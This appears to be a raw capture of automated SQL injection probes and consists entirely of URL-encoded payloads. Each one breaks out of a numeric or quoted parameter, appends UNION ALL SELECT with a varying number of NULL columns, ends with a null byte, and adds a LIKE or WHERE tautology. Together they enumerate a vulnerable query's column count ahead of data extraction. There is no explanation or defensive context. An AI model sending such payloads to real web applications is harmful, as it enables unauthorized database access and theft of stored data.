1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22bAeS%22%20LIKE%20%22bAeS 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22BJXy%22%20LIKE%20%22BJXy 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22oUuV%22%20LIKE%20%22oUuV 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22PNEb%22%20LIKE%20%22PNEb 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22QSzG%22%20LIKE%20%22QSzG 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22HhAG%22%20LIKE%20%22HhAG 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22lENU%22%20LIKE%20%22lENU 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22gxHO%22%20LIKE%20%22gxHO 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22qVpr%22%20LIKE%20%22qVpr 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22tUwj%22%20LIKE%20%22tUwj 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22bMtH%22%20LIKE%20%22bMtH 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22veNI%22%20LIKE%20%22veNI 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22PVcA%22%20LIKE%20%22PVcA 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22sPam%22%20LIKE%20%22sPam 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22KJsz%22%20LIKE%20%22KJsz 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22TPVy%22%20LIKE%20%22TPVy 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22tgjG%22%20LIKE%20%22tgjG 1234.5%29%20WHERE%205206%3D5206%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%202728%3D2728%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%201214%3D1214%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%203909%3D3909%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%201521%3D1521%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%205200%3D5200%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%203982%3D3982%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%206110%3D6110%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%202700%3D2700%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%205155%3D5155%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%209038%3D9038%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%208289%3D8289%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%201727%3D1727%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%205268%3D5268%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%206090%3D6090%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%204357%3D4357%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%206219%3D6219%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%207599%3D7599%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%207370%3D7370%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%206949%3D6949%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%207488%3D7488%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%204848%3D4848%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%207539%3D7539%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%204712%3D4712%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%209100%3D9100%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%203899%3D3899%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%202061%3D2061%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%207930%3D7930%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 